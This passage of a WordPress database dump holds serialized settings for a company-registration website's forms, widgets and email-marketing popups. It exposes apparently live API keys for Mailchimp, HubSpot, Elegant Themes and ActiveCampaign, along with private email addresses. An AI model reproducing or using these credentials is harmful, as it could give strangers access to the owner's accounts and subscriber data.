+0000\";s:2:\"ID\";s:15:\"CF5714b9a9ee4ba\";s:10:\"cf_version\";s:7:\"1.3.4.2\";s:4:\"name\";s:18:\"Annual Return Form\";s:11:\"description\";s:43:\"For submission of annual return information\";s:10:\"db_support\";i:1;s:6:\"pinned\";i:0;s:9:\"hide_form\";i:1;s:11:\"check_honey\";i:1;s:7:\"success\";s:48:\"Form has been successfully submitted. Thank you.\";s:12:\"avatar_field\";N;s:9:\"form_ajax\";i:1;s:15:\"custom_callback\";s:0:\"\";s:11:\"layout_grid\";a:2:{s:6:\"fields\";a:7:{s:11:\"fld_5001800\";s:3:\"1:1\";s:11:\"fld_5442186\";s:3:\"2:1\";s:11:\"fld_4734641\";s:3:\"3:1\";s:11:\"fld_4750442\";s:3:\"4:1\";s:11:\"fld_7437829\";s:3:\"5:1\";s:11:\"fld_6790916\";s:3:\"6:1\";s:11:\"fld_5578548\";s:3:\"7:1\";}s:9:\"structure\";s:20:\"12|12|12|12|12|12|12\";}s:6:\"fields\";a:7:{s:11:\"fld_5001800\";a:8:{s:2:\"ID\";s:11:\"fld_5001800\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:9:\"Full Name\";s:4:\"slug\";s:9:\"full_name\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";}}s:11:\"fld_5442186\";a:8:{s:2:\"ID\";s:11:\"fld_5442186\";s:4:\"type\";s:5:\"email\";s:5:\"label\";s:13:\"Email Address\";s:4:\"slug\";s:13:\"email_address\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:3:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";}}s:11:\"fld_4734641\";a:8:{s:2:\"ID\";s:11:\"fld_4734641\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:12:\"Company Name\";s:4:\"slug\";s:12:\"company_name\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";}}s:11:\"fld_4750442\";a:8:{s:2:\"ID\";s:11:\"fld_4750442\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:27:\"Company Registration Number\";s:4:\"slug\";s:27:\"company_registration_number\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:14:\"1900/000000/00\";s:7:\"default\";s:0:\"\";s:4:\"mask\";s:14:\"1900/000000/00\";s:13:\"type_override\";s:4:\"text\";}}s:11:\"fld_7437829\";a:8:{s:2:\"ID\";s:11:\"fld_7437829\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:32:\"Turnover for the respective year\";s:4:\"slug\";s:32:\"turnover_for_the_respective_year\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:13:\"type_override\";s:6:\"number\";}}s:11:\"fld_6790916\";a:7:{s:2:\"ID\";s:11:\"fld_6790916\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:36:\"Please review before clicking submit\";s:4:\"slug\";s:36:\"please_review_before_clicking_submit\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:2:{s:12:\"custom_class\";s:0:\"\";s:7:\"default\";s:164:\"<h2>Before you submit?</h2>\n<p>Review the details of your submission.\nPlease be patient, after you click submit the form will take 20-30 seconds to upload </p>\n<hr>\";}}s:11:\"fld_5578548\";a:7:{s:2:\"ID\";s:11:\"fld_5578548\";s:4:\"type\";s:6:\"button\";s:5:\"label\";s:6:\"Submit\";s:4:\"slug\";s:6:\"submit\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:4:\"type\";s:6:\"submit\";s:5:\"class\";s:15:\"btn btn-default\";s:11:\"label_space\";i:1;s:6:\"target\";s:0:\"\";}}}s:10:\"page_names\";a:1:{i:0;s:6:\"Page 1\";}s:18:\"conditional_groups\";a:1:{s:15:\"_open_condition\";s:0:\"\";}s:8:\"settings\";a:1:{s:10:\"responsive\";a:1:{s:11:\"break_point\";s:2:\"sm\";}}s:6:\"mailer\";a:10:{s:9:\"on_insert\";i:1;s:11:\"sender_name\";s:26:\"Caldera Forms Notification\";s:12:\"sender_email\";s:31:\"info@companyregistration.online\";s:8:\"reply_to\";s:15:\"%email_address%\";s:10:\"email_type\";s:4:\"html\";s:8:\"csv_data\";i:1;s:10:\"recipients\";s:31:\"info@companyregistration.online\";s:6:\"bcc_to\";s:19:\"zainubmaw@gmail.com\";s:13:\"email_subject\";s:18:\"Annual Return Form\";s:13:\"email_message\";s:9:\"{summary}\";}s:7:\"version\";s:7:\"1.3.4.2\";}','yes'),(7056,'monsterinsights_welcome_1','1','yes'),(7142,'jetpack_security_report','a:0:{}','yes'),(7151,'widget_blog_subscription','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(7152,'widget_facebook-likebox','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(7153,'widget_wpcom-goodreads','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(7154,'widget_googleplus-badge','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(7155,'widget_grofile','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(7156,'widget_image','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(7157,'widget_rss_links','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(7158,'widget_wpcom_social_media_icons_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(7159,'widget_twitter_timeline','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(7160,'widget_jetpack_display_posts_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(7197,'trusted_ip_header','O:8:\"stdClass\":3:{s:14:\"trusted_header\";s:20:\"HTTP_X_FORWARDED_FOR\";s:8:\"segments\";i:1;s:7:\"reverse\";b:0;}','no'),(7703,'lang_id','0','yes'),(7706,'stats_cache','a:2:{s:32:\"bb09235c7f7ea5a31d8a2525895339a7\";a:1:{i:1490605152;a:0:{}}s:32:\"13a4117600e51d7ec35b0862e53b51b0\";a:1:{i:1490605153;a:0:{}}}','yes'),(12131,'_wp_session_expires_90edefbb19659f3d89eabdb610920805','2955250532','no'),(14614,'widget_mc4wp_form_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(14615,'mc4wp_flash_messages','a:0:{}','yes'),(14635,'mc4wp','a:2:{s:7:\"api_key\";s:37:\"fc69d599c682cd064e50d98a92e4ee25-us10\";s:20:\"allow_usage_tracking\";i:0;}','yes'),(14669,'mc4wp_form_stylesheets','a:1:{i:0;s:6:\"themes\";}','yes'),(14670,'mc4wp_form_preview_id','409','no'),(20074,'psmi_defaults','a:3:{s:7:\"menu_id\";s:2:\"13\";s:9:\"post_type\";a:3:{i:0;s:4:\"post\";i:1;s:4:\"page\";i:2;s:7:\"product\";}s:17:\"items_defaultview\";s:4:\"show\";}','yes'),(27855,'_wp_session_expires_82129036fa731031ff75362207737984','2960772506','no'),(33227,'widget_widget_contact_info','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(33228,'widget_top-posts','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(36231,'leadin_options','a:12:{s:12:\"li_installed\";i:1;s:14:\"leadin_version\";s:5:\"5.0.2\";s:8:\"li_email\";s:31:\"info@companyregistration.online\";s:23:\"li_updates_subscription\";i:1;s:15:\"onboarding_step\";i:1;s:19:\"onboarding_complete\";i:0;s:21:\"ignore_settings_popup\";i:0;s:14:\"data_recovered\";i:1;s:18:\"delete_flags_fixed\";i:1;s:11:\"beta_tester\";i:0;s:17:\"converted_to_tags\";i:1;s:23:\"names_added_to_contacts\";i:1;}','yes'),(36232,'leadin_pluginVersion','5.0.2','yes'),(36262,'leadin_portalId','2352548','yes'),(36263,'leadin_hapikey','f2391a84-2c18-4f7c-be70-7b48d1ec658b','yes'),(38276,'mc4wp_default_form_id','408','yes'),(442823,'wcct_posts_sample_ids','a:1:{s:14:\"wcct_timer_bar\";i:31526;}','no'),(38401,'nb_new_settings','a:4:{s:10:\"debug_mode\";s:1:\"1\";s:6:\"layout\";s:8:\"layout-1\";s:8:\"layout_1\";a:1:{s:6:\"middle\";a:5:{s:11:\"notice_type\";s:6:\"slider\";s:11:\"notice_text\";s:115:\"Notice bar for all your custom notifications for your site visitors. Tweak them as you like using flexible options.\";s:6:\"slider\";a:3:{s:6:\"slides\";a:3:{i:0;s:171:\"04 July 2016: Still experiencing technical difficulties with our telephone system. If you cannot get through to us please refer to our contact page or call 082 080 8482.  \";i:1;s:87:\"04 July 2016: We now hoping for divine intervention. The number again Call 082 080 8482\";i:2;s:170:\"July 08, 2016 at 9:43 AM\r\n\r\nFinal Deregistration of Companies and Close Corporations on July 2016 - Referred for deregistration due to non- compliance with Annual Returns\";}s:10:\"auto_start\";s:1:\"1\";s:14:\"slide_duration\";s:4:\"6000\";}s:6:\"ticker\";a:5:{s:12:\"ticker_label\";s:0:\"\";s:12:\"ticker_items\";a:1:{i:0;s:115:\"Notice bar for all your custom notifications for your site visitors. Tweak them as you like using flexible options.\";}s:16:\"ticker_direction\";s:3:\"ltr\";s:12:\"ticker_speed\";s:0:\"\";s:12:\"ticker_pause\";s:0:\"\";}s:12:\"social_icons\";a:2:{s:5:\"label\";s:0:\"\";s:5:\"icons\";a:5:{s:8:\"facebook\";a:1:{s:3:\"url\";s:0:\"\";}s:7:\"twitter\";a:1:{s:3:\"url\";s:0:\"\";}s:11:\"google-plus\";a:1:{s:3:\"url\";s:0:\"\";}s:9:\"instagram\";a:1:{s:3:\"url\";s:0:\"\";}s:8:\"linkedin\";a:1:{s:3:\"url\";s:0:\"\";}}}}}s:7:\"display\";a:12:{s:16:\"display_position\";s:6:\"bottom\";s:12:\"close_action\";s:6:\"toggle\";s:16:\"background_color\";s:7:\"#d357f2\";s:10:\"font_color\";s:7:\"#f4f4f4\";s:9:\"font_size\";s:2:\"14\";s:22:\"social_icon_background\";s:7:\"#222222\";s:28:\"social_icon_hover_background\";s:0:\"\";s:17:\"social_icon_color\";s:4:\"#fff\";s:17:\"anchor_link_color\";s:0:\"\";s:16:\"link_hover_color\";s:0:\"\";s:23:\"ticker_label_background\";s:7:\"#b61818\";s:10:\"top_bottom\";s:0:\"\";}}','yes'),(39154,'et_pb_builder_options','a:5:{s:29:\"updates_main_updates_username\";s:7:\"imraanw\";s:28:\"updates_main_updates_api_key\";s:40:\"55e63d22ae7a430c9760f35b0ef1c14af9b1a22d\";s:29:\"newsletter_main_mailchimp_key\";s:0:\"\";s:26:\"newsletter_main_aweber_key\";s:0:\"\";s:35:\"email_provider_credentials_migrated\";b:1;}','yes'),(39165,'et_pb_ab_test_settings','a:1:{s:10:\"db_version\";d:1;}','yes'),(40024,'widget_bloomwidget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(40026,'et_bloom_options','a:11:{s:10:\"db_version\";s:3:\"1.1\";s:8:\"accounts\";a:2:{s:9:\"mailchimp\";a:1:{s:50:\"www.companyregistration.online division of MAW Inc\";a:3:{s:5:\"lists\";a:9:{s:10:\"fb084be2ed\";a:3:{s:4:\"name\";s:43:\"www.companyregistration.online Free eReport\";s:17:\"subscribers_count\";s:1:\"0\";s:11:\"growth_week\";s:1:\"0\";}s:10:\"c43fc9f251\";a:3:{s:4:\"name\";s:7:\"MAW Inc\";s:17:\"subscribers_count\";s:1:\"0\";s:11:\"growth_week\";s:1:\"0\";}s:10:\"be863dcc7d\";a:3:{s:4:\"name\";s:23:\"Mailchimp for wordpress\";s:17:\"subscribers_count\";s:1:\"1\";s:11:\"growth_week\";s:1:\"0\";}s:10:\"abaf610c73\";a:3:{s:4:\"name\";s:9:\"Test List\";s:17:\"subscribers_count\";s:1:\"0\";s:11:\"growth_week\";s:1:\"0\";}s:10:\"ec951c84d8\";a:3:{s:4:\"name\";s:21:\"Facebook Sales Funnel\";s:17:\"subscribers_count\";s:1:\"0\";s:11:\"growth_week\";s:1:\"0\";}s:10:\"2d6d33becc\";a:3:{s:4:\"name\";s:35:\"Leadin 50% Off first time purchaser\";s:17:\"subscribers_count\";s:1:\"3\";s:11:\"growth_week\";s:1:\"0\";}s:10:\"542068cd37\";a:3:{s:4:\"name\";s:6:\"Leadin\";s:17:\"subscribers_count\";s:1:\"0\";s:11:\"growth_week\";s:1:\"0\";}s:10:\"08de047b4d\";a:3:{s:4:\"name\";s:33:\"Company Registration Sales Funnel\";s:17:\"subscribers_count\";s:1:\"0\";s:11:\"growth_week\";s:1:\"0\";}s:10:\"2361d27fb8\";a:3:{s:4:\"name\";s:24:\"Free Report Sales Funnel\";s:17:\"subscribers_count\";s:1:\"1\";s:11:\"growth_week\";s:1:\"0\";}}s:7:\"api_key\";s:37:\"f8bb53acbe9ac33569d157c07c5528d6-us10\";s:13:\"is_authorized\";s:4:\"true\";}}s:14:\"activecampaign\";a:2:{s:23:\"maw831.activehosted.com\";a:4:{s:5:\"lists\";a:5:{i:2;a:3:{s:4:\"name\";s:17:\"CoReg Entry Popup\";s:17:\"subscribers_count\";s:1:\"0\";s:11:\"growth_week\";s:1:\"0\";}i:3;a:3:{s:4:\"name\";s:9:\"MAW Leads\";s:17:\"subscribers_count\";s:1:\"0\";s:11:\"growth_week\";s:1:\"0\";}i:4;a:3:{s:4:\"name\";s:4:\"Main\";s:17:\"subscribers_count\";s:1:\"0\";s:11:\"growth_week\";s:1:\"0\";}i:5;a:3:{s:4:\"name\";s:51:\"CoReg + Adwords + 50%off company reg and free ebook\";s:17:\"subscribers_count\";s:1:\"0\";s:11:\"growth_week\";s:1:\"0\";}i:6;a:3:{s:4:\"name\";s:23:\"CoReg+Adwords+FreeEbook\";s:17:\"subscribers_count\";s:1:\"0\";s:11:\"growth_week\";s:1:\"0\";}}s:7:\"api_key\";s:72:\"fa7ad7dcbed82fe83b8fce10f709a8fc689038443742c59d62477758f318f46adc70dc88\";s:7:\"api_url\";s:26:\"https://maw831.api-us1.com\";s:13:\"is_authorized\";s:4:\"true\";}s:25:\"maw.digitalstrategies.biz\";a:4:{s:5:\"lists\";a:5:{i:2;a:3:{s:4:\"name\";s:17:\"CoReg Entry Popup\";s:17:\"subscribers_count\";s:1:\"0\";s:11:\"growth_week\";s:1:\"0\";}i:3;a:3:{s:4:\"name\";s:9:\"MAW Leads\";s:17:\"subscribers_count\";s:1:\"0\";s:11:\"growth_week\";s:1:\"0\";}i:4;a:3:{s:4:\"name\";s:4:\"Main\";s:17:\"subscribers_count\";s:1:\"0\";s:11:\"growth_week\";s:1:\"0\";}i:5;a:3:{s:4:\"name\";s:47:\"CoReg + Adwords + R299 company reg + free ebook\";s:17:\"subscribers_count\";s:1:\"0\";s:11:\"growth_week\";s:1:\"0\";}i:6;a:3:{s:4:\"name\";s:23:\"CoReg+Adwords+FreeEbook\";s:17:\"subscribers_count\";s:1:\"1\";s:11:\"growth_week\";s:1:\"0\";}}s:7:\"api_key\";s:72:\"fa7ad7dcbed82fe83b8fce10f709a8fc689038443742c59d62477758f318f46adc70dc88\";s:7:\"api_url\";s:26:\"https://maw831.api-us1.com\";s:13:\"is_authorized\";s:4:\"true\";}}}s:7:\"optin_1\";a:69:{s:10:\"optin_type\";s:6:\"pop_up\";s:12:\"optin_status\";s:8:\"inactive\";s:11:\"test_status\";s:6:\"active\";s:8:\"child_of\";s:0:\"\";s:12:\"child_optins\";a:1:{i:0;s:7:\"optin_2\";}s:10:\"next_optin\";s:7:\"optin_2\";s:10:\"optin_name\";s:11:\"Entry popup\";s:14:\"email_provider\";s:14:\"activecampaign\";s:12:\"account_name\";s:25:\"maw.digitalstrategies.biz\";s:10:\"email_list\";s:1:\"2\";s:11:\"custom_html\";s:0:\"\";s:17:\"disable_dbl_optin\";b:0;s:11:\"optin_title\";s:407:\"&lt;h2 style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;color: #800080;&quot;&gt;Get your company Registered for R299 &amp; the eBook&lt;/span&gt;&lt;/h2&gt;\r\n&lt;h2&gt;&nbsp;&lt;/h2&gt;\r\n&lt;h2 style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;color: #ffffff;&quot;&gt;A&lt;/span&gt;&quot;What I need To Know Before I start My Business&quot;&lt;/h2&gt;\r\n&lt;h2&gt;&nbsp;&lt;/h2&gt;\";s:13:\"optin_message\";s:239:\"&lt;p style=&quot;text-align: center;&quot;&gt;&lt;strong&gt;Save yourself money and the pain of making Rookie mistakes.&lt;/strong&gt;&lt;/p&gt;\r\n&lt;p style=&quot;text-align: center;&quot;&gt;&lt;strong&gt;&nbsp;&lt;/strong&gt;&lt;/p&gt;\";s:17:\"image_orientation\";s:4:\"left\";s:24:\"image_orientation_widget\";s:5:\"above\";s:9:\"image_url\";a:2:{s:3:\"url\";s:85:\"https://companyregistration.online/wp-content/uploads/2016/07/Free-Report-cover-1.jpg\";s:2:\"id\";s:3:\"651\";}s:15:\"image_animation\";s:4:\"tada\";s:11:\"hide_mobile\";b:0;s:15:\"header_bg_color\";s:7:\"#ffffff\";s:11:\"header_font\";s:9:\"Open Sans\";s:9:\"body_font\";s:9:\"Open Sans\";s:17:\"header_text_color\";s:4:\"dark\";s:12:\"corner_style\";s:7:\"rounded\";s:18:\"border_orientation\";s:10:\"top_bottom\";s:12:\"border_color\";s:7:\"#c7aae2\";s:12:\"border_style\";s:5:\"inset\";s:16:\"form_orientation\";s:5:\"right\";s:12:\"display_name\";b:0;s:11:\"name_fields\";s:15:\"first_last_name\";s:9:\"name_text\";s:0:\"\";s:16:\"single_name_text\";s:0:\"\";s:9:\"last_name\";s:0:\"\";s:10:\"email_text\";s:0:\"\";s:11:\"button_text\";s:18:\"Gimme My Discounts\";s:17:\"field_orientation\";s:7:\"stacked\";s:12:\"field_corner\";s:7:\"rounded\";s:10:\"text_color\";s:4:\"dark\";s:13:\"form_bg_color\";s:7:\"#ededed\";s:17:\"form_button_color\";s:7:\"#a153e0\";s:17:\"button_text_color\";s:5:\"light\";s:10:\"edge_style\";s:10:\"wedge_edge\";s:11:\"footer_text\";s:0:\"\";s:15:\"success_message\";s:187:\"Thank You, we got your submission check your inbox or spam folder for the coupon codes required on checkout to get your discount.  It should be there now or give it about 5 minutes or so.\";s:10:\"custom_css\";s:0:\"\";s:17:\"flyin_orientation\";s:5:\"right\";s:14:\"load_animation\";s:6:\"bounce\";s:12:\"trigger_auto\";s:1:\"1\";s:10:\"load_delay\";i:2;s:12:\"trigger_idle\";b:0;s:12:\"idle_timeout\";i:15;s:11:\"post_bottom\";b:0;s:15:\"comment_trigger\";b:0;s:14:\"trigger_scroll\";b:0;s:10:\"scroll_pos\";i:50;s:16:\"purchase_trigger\";b:0;s:13:\"trigger_click\";b:0;s:22:\"trigger_click_selector\";s:0:\"\";s:7:\"session\";s:1:\"1\";s:16:\"session_duration\";i:3;s:17:\"hide_mobile_optin\";b:0;s:10:\"auto_close\";b:0;s:10:\"display_on\";a:2:{i:0;s:10:\"everything\";i:1;s:4:\"home\";}s:10:\"post_types\";a:1:{i:0;s:7:\"product\";}s:15:\"post_categories\";a:5:{i:0;s:2:\"17\";i:1;s:1:\"7\";i:2;s:1:\"9\";i:3;s:1:\"8\";s:16:\"previously_saved\";s:43:\"114,115,111,39,146,113,112,1,16,17,18,7,9,8\";}s:13:\"pages_include\";s:0:\"\";s:13:\"pages_exclude\";s:0:\"\";s:13:\"posts_exclude\";s:0:\"\";s:13:\"posts_include\";s:0:\"\";}s:7:\"optin_2\";a:69:{s:10:\"optin_type\";s:6:\"pop_up\";s:12:\"optin_status\";s:6:\"active\";s:11:\"test_status\";s:0:\"\";s:8:\"child_of\";s:7:\"optin_1\";s:12:\"child_optins\";a:0:{}s:10:\"next_optin\";s:2:\"-1\";s:10:\"optin_name\";s:17:\"Entry popup_child\";s:14:\"email_provider\";s:9:\"mailchimp\";s:12:\"account_name\";s:50:\"www.companyregistration.online division of MAW Inc\";s:10:\"email_list\";s:10:\"fb084be2ed\";s:11:\"custom_html\";s:0:\"\";s:17:\"disable_dbl_optin\";b:0;s:11:\"optin_title\";s:348:\"&lt;h2 style=&quot;text-align: center;&quot;&gt;Get The eBook &lt;span style=&quot;color: #800080;&quot;&gt;&quot;What I Need To Know Before I Start My Business&quot;&lt;/span&gt;&lt;/h2&gt;\r\n&lt;h2&gt;&nbsp;&lt;/h2&gt;\r\n&lt;h2 style=&quot;text-align: center;&quot;&gt;Free + your company registered for R299&lt;/h2&gt;\r\n&lt;h2&gt;&nbsp;&lt;/h2&gt;\";s:13:\"optin_message\";s:116:\"&lt;p style=&quot;text-align: center;&quot;&gt;&lt;strong&gt;Act now to save money and time&lt;/strong&gt;&lt;/p&gt;\";s:17:\"image_orientation\";s:4:\"left\";s:24:\"image_orientation_widget\";s:5:\"above\";s:9:\"image_url\";a:2:{s:3:\"url\";s:85:\"https://companyregistration.online/wp-content/uploads/2016/07/Free-Report-cover-1.jpg\";s:2:\"id\";s:3:\"651\";}s:15:\"image_animation\";s:6:\"fadein\";s:11:\"hide_mobile\";b:0;s:15:\"header_bg_color\";s:7:\"#ffffff\";s:11:\"header_font\";s:9:\"Open Sans\";s:9:\"body_font\";s:9:\"Open Sans\";s:17:\"header_text_color\";s:4:\"dark\";s:12:\"corner_style\";s:7:\"squared\";s:18:\"border_orientation\";s:9:\"no_border\";s:12:\"border_color\";s:7:\"#424242\";s:12:\"border_style\";s:5:\"solid\";s:16:\"form_orientation\";s:5:\"right\";s:12:\"display_name\";b:0;s:11:\"name_fields\";s:15:\"first_last_name\";s:9:\"name_text\";s:0:\"\";s:16:\"single_name_text\";s:0:\"\";s:9:\"last_name\";s:0:\"\";s:10:\"email_text\";s:0:\"\";s:11:\"button_text\";s:6:\"Submit\";s:17:\"field_orientation\";s:7:\"stacked\";s:12:\"field_corner\";s:7:\"rounded\";s:10:\"text_color\";s:4:\"dark\";s:13:\"form_bg_color\";s:7:\"#ededed\";s:17:\"form_button_color\";s:7:\"#a153e0\";s:17:\"button_text_color\";s:5:\"light\";s:10:\"edge_style\";s:13:\"breakout_edge\";s:11:\"footer_text\";s:0:\"\";s:15:\"success_message\";s:155:\"Thank You we got your submission check your inbox or spam folder for the coupon codes to be used on checkout.  It should be there now or in 5 minutes or so\";s:10:\"custom_css\";s:0:\"\";s:17:\"flyin_orientation\";s:5:\"right\";s:14:\"load_animation\";s:6:\"fadein\";s:12:\"trigger_auto\";s:1:\"1\";s:10:\"load_delay\";i:7;s:12:\"trigger_idle\";b:0;s:12:\"idle_timeout\";i:15;s:11:\"post_bottom\";s:1:\"1\";s:15:\"comment_trigger\";b:0;s:14:\"trigger_scroll\";b:0;s:10:\"scroll_pos\";i:50;s:16:\"purchase_trigger\";b:0;s:13:\"trigger_click\";b:0;s:22:\"trigger_click_selector\";s:0:\"\";s:7:\"session\";b:0;s:16:\"session_duration\";i:1;s:17:\"hide_mobile_optin\";b:0;s:10:\"auto_close\";b:0;s:10:\"display_on\";a:0:{}s:10:\"post_types\";a:1:{i:0;s:4:\"post\";}s:15:\"post_categories\";a:16:{i:0;s:3:\"114\";i:1;s:3:\"115\";i:2;s:3:\"111\";i:3;s:2:\"39\";i:4;s:3:\"146\";i:5;s:3:\"113\";i:6;s:3:\"112\";i:7;s:1:\"1\";i:8;s:2:\"16\";i:9;s:2:\"17\";i:10;s:2:\"18\";i:11;s:1:\"7\";i:12;s:1:\"9\";i:13;s:1:\"8\";s:11:\"auto_select\";s:1:\"1\";s:16:\"previously_saved\";s:43:\"114,115,111,39,146,113,112,1,16,17,18,7,9,8\";}s:13:\"pages_include\";s:0:\"\";s:13:\"pages_exclude\";s:0:\"\";s:13:\"posts_exclude\";s:0:\"\";s:13:\"posts_include\";s:0:\"\";}s:7:\"optin_3\";a:69:{s:10:\"optin_type\";s:6:\"locked\";s:12:\"optin_status\";s:8:\"inactive\";s:11:\"test_status\";s:0:\"\";s:8:\"child_of\";s:0:\"\";s:12:\"child_optins\";a:0:{}s:10:\"next_optin\";s:2:\"-1\";s:10:\"optin_name\";s:47:\"CoReg + Adwords + R299 company reg & free ebook\";s:14:\"email_provider\";s:14:\"activecampaign\";s:12:\"account_name\";s:25:\"maw.digitalstrategies.biz\";s:10:\"email_list\";s:1:\"5\";s:11:\"custom_html\";s:0:\"\";s:17:\"disable_dbl_optin\";b:0;s:11:\"optin_title\";s:101:\"&lt;h2 style=&quot;text-align: center;&quot;&gt;A business is a great wealth building tool&lt;/h2&gt;\";s:13:\"optin_message\";s:661:\"&lt;p style=&quot;text-align: center;&quot;&gt;&nbsp;&lt;/p&gt;\r\n&lt;p style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;color: #800080;&quot;&gt;&lt;strong&gt;R299 to register your company &amp; get a free ebook worth R199&lt;/strong&gt;&lt;/span&gt;&lt;/p&gt;\r\n&lt;p style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;color: #800080;&quot;&gt;&lt;strong&gt;Ebook - &quot;What I Need To Know Before I Start My Business&quot;&lt;/strong&gt;&lt;/span&gt;&lt;/p&gt;\r\n&lt;p style=&quot;text-align: center;&quot;&gt;&lt;strong&gt;Save money, time and the frustration of making rookie entrepreneur mistakes&lt;br /&gt;&lt;/strong&gt;&lt;/p&gt;\";s:17:\"image_orientation\";s:5:\"right\";s:24:\"image_orientation_widget\";s:8:\"no_image\";s:9:\"image_url\";a:2:{s:3:\"url\";s:101:\"https://companyregistration.online/wp-content/uploads/2016/09/Free-Report-cover-CoRegAdwords50off.png\";s:2:\"id\";s:5:\"27843\";}s:15:\"image_animation\";s:4:\"tada\";s:11:\"hide_mobile\";s:1:\"1\";s:15:\"header_bg_color\";s:0:\"\";s:11:\"header_font\";s:9:\"Open Sans\";s:9:\"body_font\";s:9:\"Open Sans\";s:17:\"header_text_color\";s:4:\"dark\";s:12:\"corner_style\";s:7:\"rounded\";s:18:\"border_orientation\";s:9:\"no_border\";s:12:\"border_color\";s:0:\"\";s:12:\"border_style\";s:5:\"solid\";s:16:\"form_orientation\";s:5:\"right\";s:12:\"display_name\";b:0;s:11:\"name_fields\";s:15:\"first_last_name\";s:9:\"name_text\";s:0:\"\";s:16:\"single_name_text\";s:0:\"\";s:9:\"last_name\";s:0:\"\";s:10:\"email_text\";s:0:\"\";s:11:\"button_text\";s:11:\"Yes! Please\";s:17:\"field_orientation\";s:6:\"inline\";s:12:\"field_corner\";s:7:\"rounded\";s:10:\"text_color\";s:4:\"dark\";s:13:\"form_bg_color\";s:0:\"\";s:17:\"form_button_color\";s:0:\"\";s:17:\"button_text_color\";s:5:\"light\";s:10:\"edge_style\";s:10:\"wedge_edge\";s:11:\"footer_text\";s:37:\"Complete the form to get your goodies\";s:15:\"success_message\";s:109:\"Submitted successfully!!!\r\n\r\nCheck your Inbox or spam folder for your coupon codes and links to your purchase\";s:10:\"custom_css\";s:0:\"\";s:17:\"flyin_orientation\";s:5:\"right\";s:14:\"load_animation\";s:6:\"fadein\";s:12:\"trigger_auto\";s:1:\"1\";s:10:\"load_delay\";i:20;s:12:\"trigger_idle\";b:0;s:12:\"idle_timeout\";i:15;s:11:\"post_bottom\";s:1:\"1\";s:15:\"comment_trigger\";b:0;s:14:\"trigger_scroll\";b:0;s:10:\"scroll_pos\";i:50;s:16:\"purchase_trigger\";b:0;s:13:\"trigger_click\";b:0;s:22:\"trigger_click_selector\";s:0:\"\";s:7:\"session\";b:0;s:16:\"session_duration\";i:1;s:17:\"hide_mobile_optin\";b:0;s:10:\"auto_close\";b:0;s:10:\"display_on\";a:0:{}s:10:\"post_types\";a:1:{i:0;s:4:\"post\";}s:15:\"post_categories\";a:16:{i:0;s:3:\"114\";i:1;s:3:\"115\";i:2;s:3:\"111\";i:3;s:2:\"39\";i:4;s:3:\"146\";i:5;s:3:\"113\";i:6;s:3:\"112\";i:7;s:1:\"1\";i:8;s:2:\"16\";i:9;s:2:\"17\";i:10;s:2:\"18\";i:11;s:1:\"7\";i:12;s:1:\"9\";i:13;s:1:\"8\";s:11:\"auto_select\";s:1:\"1\";s:16:\"previously_saved\";s:43:\"114,115,111,39,146,113,112,1,16,17,18,7,9,8\";}s:13:\"pages_include\";s:0:\"\";s:13:\"pages_exclude\";s:0:\"\";s:13:\"posts_exclude\";s:0:\"\";s:13:\"posts_include\";s:0:\"\";}s:7:\"optin_4\";a:69:{s:10:\"optin_type\";s:6:\"inline\";s:12:\"optin_status\";s:8:\"inactive\";s:11:\"test_status\";s:0:\"\";s:8:\"child_of\";s:0:\"\";s:12:\"child_optins\";a:0:{}s:10:\"next_optin\";s:2:\"-1\";s:10:\"optin_name\";s:28:\"GoReg+Adwords+50%+Free 